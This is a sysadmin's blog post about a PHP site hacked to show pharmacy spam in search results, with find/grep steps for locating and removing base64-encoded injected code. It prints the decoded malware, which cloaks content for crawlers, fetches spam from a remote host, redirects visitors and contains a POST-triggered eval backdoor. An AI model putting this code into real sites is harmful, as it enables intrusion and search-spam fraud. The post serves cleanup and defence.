Site Hacked with Pharmacy Spammy Content on search listings

Got a email* today today that searches on are resulting in pharmacy spammy urls and contents. It took around three hours to find out what is happening and fixing it. Finally the site should be free of spam now. It may take a while to update google index entries but redirect is not happening any more.

For the benefit of sysadmins who may face this issue here are some details to take care of this

Anatomy of Site hacked with pharmacy spammy content on search listings

How it works , how google listings are modified

A malicious code is inserted in one of your files such as functions.php file.
This Code modifies request for the pages to your website to be served from another server.
When googlebot/msn or other bots indexes the site , your content is hidden due to redirect and pharmacy spammy content is retrieved by the bot. This result is updated in the Google index and you see the entries in Google search results.
( You can check what Google-bot , msn , yahoo bots are getting from your web page — )

When you click on the link in the search engine it is redirected to other site from within your site so link remains the same and content & its description changes.

Here is the details to find out and remove the malicious software from your site

  • 1. The hacked code is generally inserted in a php or other files as base64 encoded strings similar to one beloweval(base64_decode(‘ZXJyb3J….OC44M — so on for few lines ( ~8k string in this example )
  • 2. Use find and grep to find the eval & base64_decode string inside the files , Many files will have it for legitimate purpose but the hacked file will have a encode string to hide the program line .Use following command to find the code :find . -exec grep -i eval {} ; | grep base64; — look for long strings of numbers and letters

    find . -exec grep -l eval {} ; | grep base64; — Gives names of files

  • 3. From the above commands pin point the hacked file name. Do a `more` on the file to see that you have the correct file. Rename the file so that it is no longer used by any program.
  • 4. if you have a copy of original file then copy it here or you can do a grep -v base64 > good-file.php to remove the string code and rename to original file.
  • 5. if interested, You can check copy paste the string at to see what the program was trying to do.

For the curious who wants to know what is happening here is the code after base64 decoding ( . This was added in one of the .php file as base64 encoded string of ~7k long casuing google results to show spammy link description.

———-code —
$bot_list = array(“8.6.48”,”62.172.199″… …. “, “94.100.17”);
$ip = preg_replace(“/.(d+)$/”, ”, $_SERVER[“REMOTE_ADDR”]);
$originalip = $_SERVER[“REMOTE_ADDR”];
function read_content($getsite,$getpage,$typeread) {
if ($typeread == “seo”){
if ($typeread == “traffic”){
if (function_exists(“curl_init”)) {
$c = curl_init();
curl_setopt($c, CURLOPT_URL, $sourceurl);
curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
curl_setopt($c, CURLOPT_TIMEOUT, 10);
$out = curl_exec($c);
$out = @file_get_contents($sourceurl);
if(!preg_match(‘/^http(s){0,1}://(.*?)//’, $sourceurl, $matches)) {
$out = “”;
$domain = $matches[2];
$fp = fsockopen($domain, 80, $errno, $errstr, 30);
if(!$fp) { $out = ”; } else {
$crlf = “rn”;
$req = “GET $sourceurl HTTP/1.0″.$crlf;
$req .= ‘Host: ‘.$domain.$crlf;
$req .= ‘User-Agent: Mozilla/5.0 Firefox/3.6.12’.$crlf.$crlf;
fwrite($fp, $req);
$out = ”;
while(!feof($fp)) {
$out .= fgets($fp, 256);
$out = substr($out, strpos($out, “rnrn”)+4);
$out = “0”;
return $out;
if(!array_key_exists(‘HTTP_USER_AGENT’, $_SERVER))
if(md5($_POST[“key”]) == “c8d4613f940c517da44c91e7223140f3”){ $cmd = $_POST[“code”]; eval (stripslashes($cmd)); exit; }
if(in_array($ip, $bot_list) || strpos($_SERVER[‘HTTP_USER_AGENT’], “bot”)) {
if (substr($printpage,0,3) == “OK!”){
$printpage = substr($printpage,3);
} else {
$printpage = “0”;
if ($printpage!=”0″) {
echo $printpage; die;
if (preg_match(‘/live|msn|yahoo|google|ask|aol/’, $_SERVER[“HTTP_REFERER”]) && !preg_match(“/^(000000000000)/”, $originalip)) {
$seopage=read_content($_SERVER[‘HTTP_HOST’],$_SERVER[‘REQUEST_URI’], ‘seo’);
if (substr($seopage,0,4) == “SEO!”){
$getkeyword = substr($seopage,4);
$urlsutra = base64_decode(‘aHR0cDovL2tsaWtjZW50cmFsLmNvbS90cmFmZmljL2luLmNnaT8xMCZwYXJhbWV0ZXI9’);
$urlsutra = $urlsutra.urlencode($getkeyword).”&seoref=”.$_SERVER[“HTTP_REFERER”].”&HTTP_REFERER=”.$_SERVER[‘HTTP_HOST’];
header(‘Cache-Control: no-cache, no-store, must-revalidate’);
$trafficpage=read_content($urlsutra,”, ‘traffic’);
echo $trafficpage; die;
} else {
header(“location: “.$urlsutra); die;
——end code ——

* Thanks Andy for pointing out this issue.

One Response to Site Hacked with Pharmacy Spammy Content on search listings

  1. Amine says:

    It happened to a website I used to manage. They inject a code that you don’t see when you browse the website. However, search engines see a different content. I think they call it “black SEO”.

    If you have access to the server config files, you can try to disable php functions you don’t need. Many scripts used by ill intentionned parties rely heavily in functions like system, passthru… etc. While most website don’t need them. If you block these, even if they manage to upload a script to the server and call it from a browser, it’s not going to work.

Leave a Reply

Your email address will not be published. Required fields are marked *